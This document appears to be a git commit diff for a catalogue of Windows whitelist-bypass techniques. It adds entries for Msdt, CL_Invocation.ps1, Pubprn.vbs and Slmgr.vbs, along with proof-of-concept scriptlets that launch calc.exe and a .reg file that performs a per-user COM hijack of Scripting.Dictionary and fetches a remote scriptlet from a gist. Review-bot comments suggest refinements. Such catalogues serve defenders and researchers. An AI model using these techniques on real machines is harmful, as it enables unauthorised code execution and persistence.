Added more in new structure
parent
e4b37b00ef
commit
0eb4ec64e3
@ -0,0 +1,29 @@
Template
## Binary.exe
* Functions: Execute
```
Example
```
Acknowledgements:
* Name of guy - @twitterhandle
Code sample:
* [NameOfLink](Payload/NameOfPayload)
Resources:
* https://linktosomethingusefull.com
Full path:
```
c:\windows\system32\binary.exe
```
Notes:
Some specific details about the binary file.
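Review bot: the acknowledgement placeholder `* Name of guy - @twitterhandle` should be neutral, e.g. `* Name - @twitterhandle`, and the template gives no guidance on the accepted values for `Functions:` (every entry in this commit uses `Execute`); a short list of allowed values in the template would keep new entries consistent. The `Full path:` placeholder `c:\windows\system32\binary.exe` is lower-case while the new pages mix `C:\Windows\...` and `c:\windows\...`; pick one casing in the template so entries do not diverge.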
@ -15,6 +15,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Installutil.exe](OSBinaries/Installutil.md)
[Mavinject32.exe](OSBinaries/Mavinject32.md)
[Msbuild.exe](OSBinaries/Msbuild.md)
[Msdt.exe](OSBinaries/Msdt.md)
[Mshta.exe](OSBinaries/Mshta.md)
[Msiexec.exe](OSBinaries/Msiexec.md)
[Odbcconf.exe](OSBinaries/Odbcconf.md)
@ -5,3 +5,4 @@ If you are missing from the acknowledgement, please let me know (I did not forge
# OS SCRIPTS
[Cl_invocation](OSScripts/Cl_invocation.md)
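Review bot: the new index entry `[Cl_invocation](OSScripts/Cl_invocation.md)` does not match the casing used in the new page's heading, `## CL_Invocation.ps1`; if the file on disk is `CL_Invocation.md` this link breaks wherever paths are case-sensitive, so align the link with the actual file name. This hunk also indexes only Cl_invocation although the same commit adds pages for `Pubprn.vbs` and `Slmgr.vbs`; add entries for those so they are reachable from the OS SCRIPTS list.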
@ -0,0 +1,15 @@
## Msdt.exe
* Functions: Execute
```
Open .diagcab package
```
Acknowledgements:
* ?
Resources:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
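Review bot: the usage block `Open .diagcab package` is a description rather than an invocation, whereas every other entry in this commit gives a runnable command line; replace it with the actual msdt.exe command from the referenced cybersyndicates write-up. The acknowledgement is still `* ?`, and the `Full path:` and `Notes:` sections that the template defines are missing entirely (this file is 15 lines against the template's 29); fill in the attribution or drop the line, and add the path so the entry matches the others.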
@ -0,0 +1,29 @@
## CL_Invocation.ps1
* Functions: Execute
```
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
SyncInvoke <executable> [args]
```
Acknowledgements:
* Jimmy - @bohops
Code sample:
Resources:
* https://twitter.com/bohops/status/948548812561436672
Full path:
```
C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
```
Notes:
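Review bot: the `Code sample:` and `Notes:` sections are empty headings with nothing under them; either remove them or fill them, for instance with a note that the script must be dot-sourced first (as the usage block `. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1` shows) and that `SyncInvoke <executable> [args]` is the function it then exposes, so a reader does not assume the script can be run directly with arguments.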
@ -0,0 +1,29 @@
## Pubprn.vbs
* Functions: Execute
```
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
```
Acknowledgements:
* Matt Nelson - @enigma0x3
Code sample:
* [Pubprn_calc.sct](Payload/Pubprn_calc.sct)
Resources:
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
Full path:
```
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
```
Notes:
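Review bot: `Notes:` is an empty heading; it should state what the example depends on, namely that the second argument `script:https://domain.com/folder/file.sct` is handed through as a moniker (the referenced WSH-injection write-up covers this) and that `127.0.0.1` is only a placeholder for the server argument, not something the script connects to. Both full paths list only the `en-US` `Printing_Admin_Scripts` folder; say whether other locale folders are expected, since the path will differ on non-English installs.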
@ -0,0 +1,30 @@
## Slmgr.vbs
* Functions: Execute
```
slmgr.vbs
```
Acknowledgements:
* Matt Nelson - @enigma0x3
* Casey Smith - @subtee
Code sample:
* [NameOfLink](Payload/NameOfPayload)
Resources:
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://www.youtube.com/watch?v=3gz1QmiMhss
Full path:
```
c:\windows\system32\slmgr.vbs
c:\windows\sysWOW64\slmgr.vbs
```
Notes:
Requires registry keys to work.
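Review bot: the usage block is just `slmgr.vbs` with no arguments, `Notes:` only says it `Requires registry keys to work`, and `Code sample:` still carries the template placeholder `* [NameOfLink](Payload/NameOfPayload)`; link the `.reg` file and the Scripting.Dictionary scriptlet that this same commit adds, and spell out in Notes which keys must be imported first (the HKCU `Scripting.Dictionary` CLSID hijack in that .reg file) so a reader can reproduce the execution path.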
@ -0,0 +1,22 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
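Review bot: `var r = new ActiveXObject("WScript.Shell").Run("calc.exe");` assigns a return value that is never used; a bare `new ActiveXObject("WScript.Shell").Run("calc.exe");` is clearer. The registration block uses the placeholder progid/description `Bandit` with no explanation; a short comment tying this file to the Pubprn.vbs entry (which links it as `Payload/Pubprn_calc.sct`) would help readers who open the payload on its own.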
@ -0,0 +1,24 @@
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://gist.githubusercontent.com/enigma0x3/4373e9a63aaebe177c747af9bc6da743/raw/2207d8a1a536371aff5f61c8bef8400622868976/wee.png"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="Scripting.Dictionary"
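Review bot: `ScriptletURL` points at an external gist (`.../raw/.../wee.png`) instead of the Scripting.Dictionary scriptlet added in this same commit, so anyone importing this .reg file runs whatever that gist serves at the time; point it at the repo's own payload instead. It is also worth stating on the Slmgr page that this is a per-user COM hijack (the `HKEY_CURRENT_USER\Software\Classes` registration takes precedence over the machine-wide one for the hijacked ProgID) and shipping a matching cleanup .reg that removes the `Scripting.Dictionary` and `{00000001-0000-0000-0000-0000FEEDACDC}` keys, since leaving them behind keeps every consumer of that ProgID redirected.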
@ -0,0 +1,22 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
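Review bot: `classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"` is the same value used in Pubprn_calc.sct and differs from the `{00000001-0000-0000-0000-0000FEEDACDC}` CLSID that the .reg file registers for `Scripting.Dictionary`; if the registration block's classid is irrelevant when the scriptlet is fetched through `ScriptletURL`, say so in a comment, otherwise align it with the .reg CLSID so the two files are obviously a pair. `version="1"` here versus `version="1.00"` in the other scriptlet, and the unused `var r =` assignment, are minor consistency nits.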